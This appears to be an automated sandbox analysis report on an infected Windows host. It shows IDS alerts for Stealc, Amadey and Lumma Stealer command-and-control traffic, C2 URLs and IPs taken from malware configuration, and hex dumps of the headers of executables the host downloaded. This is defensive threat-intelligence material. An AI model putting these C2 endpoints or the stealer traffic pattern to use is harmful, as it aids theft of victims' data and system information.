Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49724 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50019 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.6:52822 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.6:50045 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50028

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 12:31:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 